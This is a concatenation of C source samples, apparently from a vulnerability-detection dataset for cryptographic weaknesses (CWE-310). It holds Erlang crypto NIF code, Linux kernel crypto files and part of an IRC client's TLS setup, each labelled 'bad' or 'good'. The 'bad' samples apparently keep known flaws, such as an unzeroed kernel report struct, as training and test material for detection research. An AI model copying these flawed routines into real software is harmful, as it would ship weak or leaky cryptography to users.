if (!enif_get_list_cell(env, argv[2], &head, &tail)
|| !get_bn_from_mpint(env, head, &dsa->p)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &dsa->q)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &dsa->g)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &dsa->priv_key)
|| !enif_is_empty_list(env,tail)) {
goto badarg;
}
if (argv[0] == atom_sha && inspect_mpint(env, argv[1], &data_bin)) {
SHA1(data_bin.data+4, data_bin.size-4, hmacbuf);
}
else if (argv[0] == atom_none && enif_inspect_binary(env,argv[1],&data_bin)
&& data_bin.size == SHA_DIGEST_LENGTH) {
memcpy(hmacbuf, data_bin.data, SHA_DIGEST_LENGTH);
}
else {
badarg:
DSA_free(dsa);
return enif_make_badarg(env);
}
enif_alloc_binary(DSA_size(dsa), &ret_bin);
i = DSA_sign(NID_sha1, hmacbuf, SHA_DIGEST_LENGTH,
ret_bin.data, &dsa_s_len, dsa);
DSA_free(dsa);
if (i) {
if (dsa_s_len != ret_bin.size) {
enif_realloc_binary(&ret_bin, dsa_s_len);
}
return enif_make_binary(env, &ret_bin);
}
else {
return atom_error;
}
}
static int rsa_pad(ERL_NIF_TERM term, int* padding)
{
if (term == atom_rsa_pkcs1_padding) {
*padding = RSA_PKCS1_PADDING;
}
else if (term == atom_rsa_pkcs1_oaep_padding) {
*padding = RSA_PKCS1_OAEP_PADDING;
}
else if (term == atom_rsa_no_padding) {
*padding = RSA_NO_PADDING;
}
else {
return 0;
}
return 1;
}
static ERL_NIF_TERM rsa_public_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Data, PublKey=[E,N], Padding, IsEncrypt) */
ErlNifBinary data_bin, ret_bin;
ERL_NIF_TERM head, tail;
int padding, i;
RSA* rsa = RSA_new();
if (!enif_inspect_binary(env, argv[0], &data_bin)
|| !enif_get_list_cell(env, argv[1], &head, &tail)
|| !get_bn_from_mpint(env, head, &rsa->e)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &rsa->n)
|| !enif_is_empty_list(env,tail)
|| !rsa_pad(argv[2], &padding)) {
RSA_free(rsa);
return enif_make_badarg(env);
}
enif_alloc_binary(RSA_size(rsa), &ret_bin);
if (argv[3] == atom_true) {
ERL_VALGRIND_ASSERT_MEM_DEFINED(data_bin.data,data_bin.size);
i = RSA_public_encrypt(data_bin.size, data_bin.data,
ret_bin.data, rsa, padding);
if (i > 0) {
ERL_VALGRIND_MAKE_MEM_DEFINED(ret_bin.data, i);
}
}
else {
i = RSA_public_decrypt(data_bin.size, data_bin.data,
ret_bin.data, rsa, padding);
if (i > 0) {
ERL_VALGRIND_MAKE_MEM_DEFINED(ret_bin.data, i);
enif_realloc_binary(&ret_bin, i);
}
}
RSA_free(rsa);
if (i > 0) {
return enif_make_binary(env,&ret_bin);
}
else {
enif_release_binary(&ret_bin);
return atom_error;
}
}
static ERL_NIF_TERM rsa_private_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Data, PublKey=[E,N,D], Padding, IsEncrypt) */
ErlNifBinary data_bin, ret_bin;
ERL_NIF_TERM head, tail;
int padding, i;
RSA* rsa = RSA_new();
if (!enif_inspect_binary(env, argv[0], &data_bin)
|| !enif_get_list_cell(env, argv[1], &head, &tail)
|| !get_bn_from_mpint(env, head, &rsa->e)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &rsa->n)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &rsa->d)
|| !enif_is_empty_list(env,tail)
|| !rsa_pad(argv[2], &padding)) {
RSA_free(rsa);
return enif_make_badarg(env);
}
enif_alloc_binary(RSA_size(rsa), &ret_bin);
if (argv[3] == atom_true) {
ERL_VALGRIND_ASSERT_MEM_DEFINED(data_bin.data,data_bin.size);
i = RSA_private_encrypt(data_bin.size, data_bin.data,
ret_bin.data, rsa, padding);
if (i > 0) {
ERL_VALGRIND_MAKE_MEM_DEFINED(ret_bin.data, i);
}
}
else {
i = RSA_private_decrypt(data_bin.size, data_bin.data,
ret_bin.data, rsa, padding);
if (i > 0) {
ERL_VALGRIND_MAKE_MEM_DEFINED(ret_bin.data, i);
enif_realloc_binary(&ret_bin, i);
}
}
RSA_free(rsa);
if (i > 0) {
return enif_make_binary(env,&ret_bin);
}
else {
enif_release_binary(&ret_bin);
return atom_error;
}
}
static ERL_NIF_TERM dh_generate_parameters_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (PrimeLen, Generator) */
int prime_len, generator;
DH* dh_params;
int p_len, g_len;
unsigned char *p_ptr, *g_ptr;
ERL_NIF_TERM ret_p, ret_g;
if (!enif_get_int(env, argv[0], &prime_len)
|| !enif_get_int(env, argv[1], &generator)) {
return enif_make_badarg(env);
}
dh_params = DH_generate_parameters(prime_len, generator, NULL, NULL);
if (dh_params == NULL) {
return atom_error;
}
p_len = BN_num_bytes(dh_params->p);
g_len = BN_num_bytes(dh_params->g);
p_ptr = enif_make_new_binary(env, p_len+4, &ret_p);
g_ptr = enif_make_new_binary(env, g_len+4, &ret_g);
put_int32(p_ptr, p_len);
put_int32(g_ptr, g_len);
BN_bn2bin(dh_params->p, p_ptr+4);
BN_bn2bin(dh_params->g, g_ptr+4);
ERL_VALGRIND_MAKE_MEM_DEFINED(p_ptr+4, p_len);
ERL_VALGRIND_MAKE_MEM_DEFINED(g_ptr+4, g_len);
DH_free(dh_params);
return enif_make_list2(env, ret_p, ret_g);
}
static ERL_NIF_TERM dh_check(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* ([PrimeLen, Generator]) */
DH* dh_params = DH_new();
int i;
ERL_NIF_TERM ret, head, tail;
if (!enif_get_list_cell(env, argv[0], &head, &tail)
|| !get_bn_from_mpint(env, head, &dh_params->p)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &dh_params->g)
|| !enif_is_empty_list(env,tail)) {
DH_free(dh_params);
return enif_make_badarg(env);
}
if (DH_check(dh_params, &i)) {
if (i == 0) ret = atom_ok;
else if (i & DH_CHECK_P_NOT_PRIME) ret = atom_not_prime;
else if (i & DH_CHECK_P_NOT_SAFE_PRIME) ret = atom_not_strong_prime;
else if (i & DH_UNABLE_TO_CHECK_GENERATOR) ret = atom_unable_to_check_generator;
else if (i & DH_NOT_SUITABLE_GENERATOR) ret = atom_not_suitable_generator;
else ret = enif_make_tuple2(env, atom_unknown, enif_make_uint(env, i));
}
else { /* Check Failed */
ret = enif_make_tuple2(env, atom_error, atom_check_failed);
}
DH_free(dh_params);
return ret;
}
static ERL_NIF_TERM dh_generate_key_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (PrivKey, DHParams=[P,G]) */
DH* dh_params = DH_new();
int pub_len, prv_len;
unsigned char *pub_ptr, *prv_ptr;
ERL_NIF_TERM ret, ret_pub, ret_prv, head, tail;
if (!(get_bn_from_mpint(env, argv[0], &dh_params->priv_key)
|| argv[0] == atom_undefined)
|| !enif_get_list_cell(env, argv[1], &head, &tail)
|| !get_bn_from_mpint(env, head, &dh_params->p)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &dh_params->g)
|| !enif_is_empty_list(env, tail)) {
DH_free(dh_params);
return enif_make_badarg(env);
}
if (DH_generate_key(dh_params)) {
pub_len = BN_num_bytes(dh_params->pub_key);
prv_len = BN_num_bytes(dh_params->priv_key);
pub_ptr = enif_make_new_binary(env, pub_len+4, &ret_pub);
prv_ptr = enif_make_new_binary(env, prv_len+4, &ret_prv);
put_int32(pub_ptr, pub_len);
put_int32(prv_ptr, prv_len);
BN_bn2bin(dh_params->pub_key, pub_ptr+4);
BN_bn2bin(dh_params->priv_key, prv_ptr+4);
ERL_VALGRIND_MAKE_MEM_DEFINED(pub_ptr+4, pub_len);
ERL_VALGRIND_MAKE_MEM_DEFINED(prv_ptr+4, prv_len);
ret = enif_make_tuple2(env, ret_pub, ret_prv);
}
else {
ret = atom_error;
}
DH_free(dh_params);
return ret;
}
static ERL_NIF_TERM dh_compute_key_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (OthersPublicKey, MyPrivateKey, DHParams=[P,G]) */
DH* dh_params = DH_new();
BIGNUM* pubkey = NULL;
int i;
ErlNifBinary ret_bin;
ERL_NIF_TERM ret, head, tail;
if (!get_bn_from_mpint(env, argv[0], &pubkey)
|| !get_bn_from_mpint(env, argv[1], &dh_params->priv_key)
|| !enif_get_list_cell(env, argv[2], &head, &tail)
|| !get_bn_from_mpint(env, head, &dh_params->p)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &dh_params->g)
|| !enif_is_empty_list(env, tail)) {
ret = enif_make_badarg(env);
}
else {
enif_alloc_binary(DH_size(dh_params), &ret_bin);
i = DH_compute_key(ret_bin.data, pubkey, dh_params);
if (i > 0) {
if (i != ret_bin.size) {
enif_realloc_binary(&ret_bin, i);
}
ret = enif_make_binary(env, &ret_bin);
}
else {
ret = atom_error;
}
}
if (pubkey) BN_free(pubkey);
DH_free(dh_params);
return ret;
}
static ERL_NIF_TERM bf_cfb64_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, Ivec, Data, IsEncrypt) */
ErlNifBinary key_bin, ivec_bin, data_bin;
BF_KEY bf_key; /* blowfish key 8 */
unsigned char bf_tkey[8]; /* blowfish ivec */
int bf_n = 0; /* blowfish ivec pos */
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key_bin)
|| !enif_inspect_binary(env, argv[1], &ivec_bin)
|| ivec_bin.size != 8
|| !enif_inspect_iolist_as_binary(env, argv[2], &data_bin)) {
return enif_make_badarg(env);
}
BF_set_key(&bf_key, key_bin.size, key_bin.data);
memcpy(bf_tkey, ivec_bin.data, 8);
BF_cfb64_encrypt(data_bin.data, enif_make_new_binary(env,data_bin.size,&ret),
data_bin.size, &bf_key, bf_tkey, &bf_n,
(argv[3] == atom_true ? BF_ENCRYPT : BF_DECRYPT));
return ret;
}
static ERL_NIF_TERM bf_cbc_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, Ivec, Data, IsEncrypt) */
ErlNifBinary key_bin, ivec_bin, data_bin;
BF_KEY bf_key; /* blowfish key 8 */
unsigned char bf_tkey[8]; /* blowfish ivec */
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key_bin)
|| !enif_inspect_binary(env, argv[1], &ivec_bin)
|| ivec_bin.size != 8
|| !enif_inspect_iolist_as_binary(env, argv[2], &data_bin)
|| data_bin.size % 8 != 0) {
return enif_make_badarg(env);
}
BF_set_key(&bf_key, key_bin.size, key_bin.data);
memcpy(bf_tkey, ivec_bin.data, 8);
BF_cbc_encrypt(data_bin.data, enif_make_new_binary(env,data_bin.size,&ret),
data_bin.size, &bf_key, bf_tkey,
(argv[3] == atom_true ? BF_ENCRYPT : BF_DECRYPT));
return ret;
}
static ERL_NIF_TERM bf_ecb_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, Data, IsEncrypt) */
ErlNifBinary key_bin, data_bin;
BF_KEY bf_key; /* blowfish key 8 */
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key_bin)
|| !enif_inspect_iolist_as_binary(env, argv[1], &data_bin)
|| data_bin.size < 8) {
return enif_make_badarg(env);
}
BF_set_key(&bf_key, key_bin.size, key_bin.data);
BF_ecb_encrypt(data_bin.data, enif_make_new_binary(env,data_bin.size,&ret),
&bf_key, (argv[2] == atom_true ? BF_ENCRYPT : BF_DECRYPT));
return ret;
}
static ERL_NIF_TERM blowfish_ofb64_encrypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, IVec, Data) */
ErlNifBinary key_bin, ivec_bin, data_bin;
BF_KEY bf_key; /* blowfish key 8 */
unsigned char bf_tkey[8]; /* blowfish ivec */
int bf_n = 0; /* blowfish ivec pos */
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key_bin)
|| !enif_inspect_binary(env, argv[1], &ivec_bin)
|| ivec_bin.size != 8
|| !enif_inspect_iolist_as_binary(env, argv[2], &data_bin)) {
return enif_make_badarg(env);
}
BF_set_key(&bf_key, key_bin.size, key_bin.data);
memcpy(bf_tkey, ivec_bin.data, 8);
BF_ofb64_encrypt(data_bin.data, enif_make_new_binary(env,data_bin.size,&ret),
data_bin.size, &bf_key, bf_tkey, &bf_n);
return ret;
}
#ifdef OPENSSL_THREADS /* vvvvvvvvvvvvvvv OPENSSL_THREADS vvvvvvvvvvvvvvvv */
static INLINE void locking(int mode, ErlNifRWLock* lock)
{
switch (mode) {
case CRYPTO_LOCK|CRYPTO_READ:
enif_rwlock_rlock(lock);
break;
case CRYPTO_LOCK|CRYPTO_WRITE:
enif_rwlock_rwlock(lock);
break;
case CRYPTO_UNLOCK|CRYPTO_READ:
enif_rwlock_runlock(lock);
break;
case CRYPTO_UNLOCK|CRYPTO_WRITE:
enif_rwlock_rwunlock(lock);
break;
default:
ASSERT(!"Invalid lock mode");
}
}
/* Callback from openssl for static locking
*/
static void locking_function(int mode, int n, const char *file, int line)
{
ASSERT(n>=0 && n<CRYPTO_num_locks());
locking(mode, lock_vec[n]);
}
/* Callback from openssl for thread id
*/
static unsigned long id_function(void)
{
return(unsigned long) enif_thread_self();
}
/* Callbacks for dynamic locking, not used by current openssl version (0.9.8)
*/
static struct CRYPTO_dynlock_value* dyn_create_function(const char *file, int line) {
return(struct CRYPTO_dynlock_value*) enif_rwlock_create("crypto_dyn");
}
static void dyn_lock_function(int mode, struct CRYPTO_dynlock_value* ptr,const char *file, int line)
{
locking(mode, (ErlNifRWLock*)ptr);
}
static void dyn_destroy_function(struct CRYPTO_dynlock_value *ptr, const char *file, int line)
{
enif_rwlock_destroy((ErlNifRWLock*)ptr);
}
#endif /* ^^^^^^^^^^^^^^^^^^^^^^ OPENSSL_THREADS ^^^^^^^^^^^^^^^^^^^^^^ */
/* HMAC */
static void hmac_md5(unsigned char *key, int klen, unsigned char *dbuf, int dlen,
unsigned char *hmacbuf)
{
MD5_CTX ctx;
char ipad[HMAC_INT_LEN];
char opad[HMAC_INT_LEN];
unsigned char nkey[MD5_LEN];
int i;
/* Change key if longer than 64 bytes */
if (klen > HMAC_INT_LEN) {
MD5(key, klen, nkey);
key = nkey;
klen = MD5_LEN;
}
memset(ipad, '\0', sizeof(ipad));
memset(opad, '\0', sizeof(opad));
memcpy(ipad, key, klen);
memcpy(opad, key, klen);
for (i = 0; i < HMAC_INT_LEN; i++) {
ipad[i] ^= HMAC_IPAD;
opad[i] ^= HMAC_OPAD;
}
/* inner MD5 */
MD5_Init(&ctx);
MD5_Update(&ctx, ipad, HMAC_INT_LEN);
MD5_Update(&ctx, dbuf, dlen);
MD5_Final((unsigned char *) hmacbuf, &ctx);
/* outer MD5 */
MD5_Init(&ctx);
MD5_Update(&ctx, opad, HMAC_INT_LEN);
MD5_Update(&ctx, hmacbuf, MD5_LEN);
MD5_Final((unsigned char *) hmacbuf, &ctx);
}
static void hmac_sha1(unsigned char *key, int klen,
unsigned char *dbuf, int dlen,
unsigned char *hmacbuf)
{
SHA_CTX ctx;
char ipad[HMAC_INT_LEN];
char opad[HMAC_INT_LEN];
unsigned char nkey[SHA_LEN];
int i;
/* Change key if longer than 64 bytes */
if (klen > HMAC_INT_LEN) {
SHA1(key, klen, nkey);
key = nkey;
klen = SHA_LEN;
}
memset(ipad, '\0', sizeof(ipad));
memset(opad, '\0', sizeof(opad));
memcpy(ipad, key, klen);
memcpy(opad, key, klen);
for (i = 0; i < HMAC_INT_LEN; i++) {
ipad[i] ^= HMAC_IPAD;
opad[i] ^= HMAC_OPAD;
}
/* inner SHA */
SHA1_Init(&ctx);
SHA1_Update(&ctx, ipad, HMAC_INT_LEN);
SHA1_Update(&ctx, dbuf, dlen);
SHA1_Final((unsigned char *) hmacbuf, &ctx);
/* outer SHA */
SHA1_Init(&ctx);
SHA1_Update(&ctx, opad, HMAC_INT_LEN);
SHA1_Update(&ctx, hmacbuf, SHA_LEN);
SHA1_Final((unsigned char *) hmacbuf, &ctx);
}
| ./CrossVul/dataset_final_sorted/CWE-310/c/bad_3428_0 |
crossvul-cpp_data_bad_5666_6 | /*
* Cryptographic API.
*
* RNG operations.
*
* Copyright (c) 2008 Neil Horman <nhorman@tuxdriver.com>
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the Free
* Software Foundation; either version 2 of the License, or (at your option)
* any later version.
*
*/
#include <linux/atomic.h>
#include <crypto/internal/rng.h>
#include <linux/err.h>
#include <linux/module.h>
#include <linux/mutex.h>
#include <linux/random.h>
#include <linux/seq_file.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/cryptouser.h>
#include <net/netlink.h>
static DEFINE_MUTEX(crypto_default_rng_lock);
struct crypto_rng *crypto_default_rng;
EXPORT_SYMBOL_GPL(crypto_default_rng);
static int crypto_default_rng_refcnt;
static int rngapi_reset(struct crypto_rng *tfm, u8 *seed, unsigned int slen)
{
u8 *buf = NULL;
int err;
if (!seed && slen) {
buf = kmalloc(slen, GFP_KERNEL);
if (!buf)
return -ENOMEM;
get_random_bytes(buf, slen);
seed = buf;
}
err = crypto_rng_alg(tfm)->rng_reset(tfm, seed, slen);
kfree(buf);
return err;
}
static int crypto_init_rng_ops(struct crypto_tfm *tfm, u32 type, u32 mask)
{
struct rng_alg *alg = &tfm->__crt_alg->cra_rng;
struct rng_tfm *ops = &tfm->crt_rng;
ops->rng_gen_random = alg->rng_make_random;
ops->rng_reset = rngapi_reset;
return 0;
}
#ifdef CONFIG_NET
static int crypto_rng_report(struct sk_buff *skb, struct crypto_alg *alg)
{
struct crypto_report_rng rrng;
snprintf(rrng.type, CRYPTO_MAX_ALG_NAME, "%s", "rng");
rrng.seedsize = alg->cra_rng.seedsize;
if (nla_put(skb, CRYPTOCFGA_REPORT_RNG,
sizeof(struct crypto_report_rng), &rrng))
goto nla_put_failure;
return 0;
nla_put_failure:
return -EMSGSIZE;
}
#else
static int crypto_rng_report(struct sk_buff *skb, struct crypto_alg *alg)
{
return -ENOSYS;
}
#endif
static void crypto_rng_show(struct seq_file *m, struct crypto_alg *alg)
__attribute__ ((unused));
static void crypto_rng_show(struct seq_file *m, struct crypto_alg *alg)
{
seq_printf(m, "type : rng\n");
seq_printf(m, "seedsize : %u\n", alg->cra_rng.seedsize);
}
static unsigned int crypto_rng_ctxsize(struct crypto_alg *alg, u32 type,
u32 mask)
{
return alg->cra_ctxsize;
}
const struct crypto_type crypto_rng_type = {
.ctxsize = crypto_rng_ctxsize,
.init = crypto_init_rng_ops,
#ifdef CONFIG_PROC_FS
.show = crypto_rng_show,
#endif
.report = crypto_rng_report,
};
EXPORT_SYMBOL_GPL(crypto_rng_type);
int crypto_get_default_rng(void)
{
struct crypto_rng *rng;
int err;
mutex_lock(&crypto_default_rng_lock);
if (!crypto_default_rng) {
rng = crypto_alloc_rng("stdrng", 0, 0);
err = PTR_ERR(rng);
if (IS_ERR(rng))
goto unlock;
err = crypto_rng_reset(rng, NULL, crypto_rng_seedsize(rng));
if (err) {
crypto_free_rng(rng);
goto unlock;
}
crypto_default_rng = rng;
}
crypto_default_rng_refcnt++;
err = 0;
unlock:
mutex_unlock(&crypto_default_rng_lock);
return err;
}
EXPORT_SYMBOL_GPL(crypto_get_default_rng);
void crypto_put_default_rng(void)
{
mutex_lock(&crypto_default_rng_lock);
if (!--crypto_default_rng_refcnt) {
crypto_free_rng(crypto_default_rng);
crypto_default_rng = NULL;
}
mutex_unlock(&crypto_default_rng_lock);
}
EXPORT_SYMBOL_GPL(crypto_put_default_rng);
MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("Random Number Generator");
| ./CrossVul/dataset_final_sorted/CWE-310/c/bad_5666_6 |
crossvul-cpp_data_good_5666_5 | /*
* Cryptographic API.
*
* Partial (de)compression operations.
*
* Copyright 2008 Sony Corporation
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; version 2 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program.
* If not, see <http://www.gnu.org/licenses/>.
*/
#include <linux/crypto.h>
#include <linux/errno.h>
#include <linux/module.h>
#include <linux/seq_file.h>
#include <linux/string.h>
#include <linux/cryptouser.h>
#include <net/netlink.h>
#include <crypto/compress.h>
#include <crypto/internal/compress.h>
#include "internal.h"
static int crypto_pcomp_init(struct crypto_tfm *tfm, u32 type, u32 mask)
{
return 0;
}
static unsigned int crypto_pcomp_extsize(struct crypto_alg *alg)
{
return alg->cra_ctxsize;
}
static int crypto_pcomp_init_tfm(struct crypto_tfm *tfm)
{
return 0;
}
#ifdef CONFIG_NET
static int crypto_pcomp_report(struct sk_buff *skb, struct crypto_alg *alg)
{
struct crypto_report_comp rpcomp;
strncpy(rpcomp.type, "pcomp", sizeof(rpcomp.type));
if (nla_put(skb, CRYPTOCFGA_REPORT_COMPRESS,
sizeof(struct crypto_report_comp), &rpcomp))
goto nla_put_failure;
return 0;
nla_put_failure:
return -EMSGSIZE;
}
#else
static int crypto_pcomp_report(struct sk_buff *skb, struct crypto_alg *alg)
{
return -ENOSYS;
}
#endif
static void crypto_pcomp_show(struct seq_file *m, struct crypto_alg *alg)
__attribute__ ((unused));
static void crypto_pcomp_show(struct seq_file *m, struct crypto_alg *alg)
{
seq_printf(m, "type : pcomp\n");
}
static const struct crypto_type crypto_pcomp_type = {
.extsize = crypto_pcomp_extsize,
.init = crypto_pcomp_init,
.init_tfm = crypto_pcomp_init_tfm,
#ifdef CONFIG_PROC_FS
.show = crypto_pcomp_show,
#endif
.report = crypto_pcomp_report,
.maskclear = ~CRYPTO_ALG_TYPE_MASK,
.maskset = CRYPTO_ALG_TYPE_MASK,
.type = CRYPTO_ALG_TYPE_PCOMPRESS,
.tfmsize = offsetof(struct crypto_pcomp, base),
};
struct crypto_pcomp *crypto_alloc_pcomp(const char *alg_name, u32 type,
u32 mask)
{
return crypto_alloc_tfm(alg_name, &crypto_pcomp_type, type, mask);
}
EXPORT_SYMBOL_GPL(crypto_alloc_pcomp);
int crypto_register_pcomp(struct pcomp_alg *alg)
{
struct crypto_alg *base = &alg->base;
base->cra_type = &crypto_pcomp_type;
base->cra_flags &= ~CRYPTO_ALG_TYPE_MASK;
base->cra_flags |= CRYPTO_ALG_TYPE_PCOMPRESS;
return crypto_register_alg(base);
}
EXPORT_SYMBOL_GPL(crypto_register_pcomp);
int crypto_unregister_pcomp(struct pcomp_alg *alg)
{
return crypto_unregister_alg(&alg->base);
}
EXPORT_SYMBOL_GPL(crypto_unregister_pcomp);
MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("Partial (de)compression type");
MODULE_AUTHOR("Sony Corporation");
| ./CrossVul/dataset_final_sorted/CWE-310/c/good_5666_5 |
crossvul-cpp_data_bad_5867_1 | /*
* ssl.c v0.0.3
* Copyright (C) 2000 -- DaP <profeta@freemail.c3.hu>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA
*/
#ifdef __APPLE__
#define __AVAILABILITYMACROS__
#define DEPRECATED_IN_MAC_OS_X_VERSION_10_7_AND_LATER
#endif
#include "inet.h" /* make it first to avoid macro redefinitions */
#include <openssl/ssl.h> /* SSL_() */
#include <openssl/err.h> /* ERR_() */
#ifdef WIN32
#include <openssl/rand.h> /* RAND_seed() */
#endif
#include "../../config.h"
#include <time.h> /* asctime() */
#include <string.h> /* strncpy() */
#include "ssl.h" /* struct cert_info */
#include <glib.h>
#include <glib/gprintf.h>
#include "util.h"
/* If openssl was built without ec */
#ifndef SSL_OP_SINGLE_ECDH_USE
#define SSL_OP_SINGLE_ECDH_USE 0
#endif
/* globals */
static struct chiper_info chiper_info; /* static buffer for _SSL_get_cipher_info() */
static char err_buf[256]; /* generic error buffer */
/* +++++ Internal functions +++++ */
static void
__SSL_fill_err_buf (char *funcname)
{
int err;
char buf[256];
err = ERR_get_error ();
ERR_error_string (err, buf);
g_snprintf (err_buf, sizeof (err_buf), "%s: %s (%d)\n", funcname, buf, err);
}
static void
__SSL_critical_error (char *funcname)
{
__SSL_fill_err_buf (funcname);
fprintf (stderr, "%s\n", err_buf);
exit (1);
}
/* +++++ SSL functions +++++ */
SSL_CTX *
_SSL_context_init (void (*info_cb_func), int server)
{
SSL_CTX *ctx;
#ifdef WIN32
int i, r;
#endif
SSLeay_add_ssl_algorithms ();
SSL_load_error_strings ();
ctx = SSL_CTX_new (server ? SSLv23_server_method() : SSLv23_client_method ());
SSL_CTX_set_session_cache_mode (ctx, SSL_SESS_CACHE_BOTH);
SSL_CTX_set_timeout (ctx, 300);
SSL_CTX_set_options (ctx, SSL_OP_NO_SSLv2|SSL_OP_NO_SSLv3
|SSL_OP_NO_COMPRESSION
|SSL_OP_SINGLE_DH_USE|SSL_OP_SINGLE_ECDH_USE
|SSL_OP_NO_TICKET
|SSL_OP_CIPHER_SERVER_PREFERENCE);
/* used in SSL_connect(), SSL_accept() */
SSL_CTX_set_info_callback (ctx, info_cb_func);
#ifdef WIN32
/* under win32, OpenSSL needs to be seeded with some randomness */
for (i = 0; i < 128; i++)
{
r = rand ();
RAND_seed ((unsigned char *)&r, sizeof (r));
}
#endif
return(ctx);
}
static void
ASN1_TIME_snprintf (char *buf, int buf_len, ASN1_TIME * tm)
{
char *expires = NULL;
BIO *inMem = BIO_new (BIO_s_mem ());
ASN1_TIME_print (inMem, tm);
BIO_get_mem_data (inMem, &expires);
buf[0] = 0;
if (expires != NULL)
{
/* expires is not \0 terminated */
safe_strcpy (buf, expires, MIN(24, buf_len));
}
BIO_free (inMem);
}
static void
broke_oneline (char *oneline, char *parray[])
{
char *pt, *ppt;
int i;
i = 0;
ppt = pt = oneline + 1;
while ((pt = strchr (pt, '/')))
{
*pt = 0;
parray[i++] = ppt;
ppt = ++pt;
}
parray[i++] = ppt;
parray[i] = NULL;
}
/*
FIXME: Master-Key, Extensions, CA bits
(openssl x509 -text -in servcert.pem)
*/
int
_SSL_get_cert_info (struct cert_info *cert_info, SSL * ssl)
{
X509 *peer_cert;
EVP_PKEY *peer_pkey;
/* EVP_PKEY *ca_pkey; */
/* EVP_PKEY *tmp_pkey; */
char notBefore[64];
char notAfter[64];
int alg;
int sign_alg;
if (!(peer_cert = SSL_get_peer_certificate (ssl)))
return (1); /* FATAL? */
X509_NAME_oneline (X509_get_subject_name (peer_cert), cert_info->subject,
sizeof (cert_info->subject));
X509_NAME_oneline (X509_get_issuer_name (peer_cert), cert_info->issuer,
sizeof (cert_info->issuer));
broke_oneline (cert_info->subject, cert_info->subject_word);
broke_oneline (cert_info->issuer, cert_info->issuer_word);
alg = OBJ_obj2nid (peer_cert->cert_info->key->algor->algorithm);
sign_alg = OBJ_obj2nid (peer_cert->sig_alg->algorithm);
ASN1_TIME_snprintf (notBefore, sizeof (notBefore),
X509_get_notBefore (peer_cert));
ASN1_TIME_snprintf (notAfter, sizeof (notAfter),
X509_get_notAfter (peer_cert));
peer_pkey = X509_get_pubkey (peer_cert);
safe_strcpy (cert_info->algorithm,
(alg == NID_undef) ? "Unknown" : OBJ_nid2ln (alg),
sizeof (cert_info->algorithm));
cert_info->algorithm_bits = EVP_PKEY_bits (peer_pkey);
safe_strcpy (cert_info->sign_algorithm,
(sign_alg == NID_undef) ? "Unknown" : OBJ_nid2ln (sign_alg),
sizeof (cert_info->sign_algorithm));
/* EVP_PKEY_bits(ca_pkey)); */
cert_info->sign_algorithm_bits = 0;
safe_strcpy (cert_info->notbefore, notBefore, sizeof (cert_info->notbefore));
safe_strcpy (cert_info->notafter, notAfter, sizeof (cert_info->notafter));
EVP_PKEY_free (peer_pkey);
/* SSL_SESSION_print_fp(stdout, SSL_get_session(ssl)); */
/*
if (ssl->session->sess_cert->peer_rsa_tmp) {
tmp_pkey = EVP_PKEY_new();
EVP_PKEY_assign_RSA(tmp_pkey, ssl->session->sess_cert->peer_rsa_tmp);
cert_info->rsa_tmp_bits = EVP_PKEY_bits (tmp_pkey);
EVP_PKEY_free(tmp_pkey);
} else
fprintf(stderr, "REMOTE SIDE DOESN'T PROVIDES ->peer_rsa_tmp\n");
*/
cert_info->rsa_tmp_bits = 0;
X509_free (peer_cert);
return (0);
}
struct chiper_info *
_SSL_get_cipher_info (SSL * ssl)
{
const SSL_CIPHER *c;
c = SSL_get_current_cipher (ssl);
safe_strcpy (chiper_info.version, SSL_CIPHER_get_version (c),
sizeof (chiper_info.version));
safe_strcpy (chiper_info.chiper, SSL_CIPHER_get_name (c),
sizeof (chiper_info.chiper));
SSL_CIPHER_get_bits (c, &chiper_info.chiper_bits);
return (&chiper_info);
}
int
_SSL_send (SSL * ssl, char *buf, int len)
{
int num;
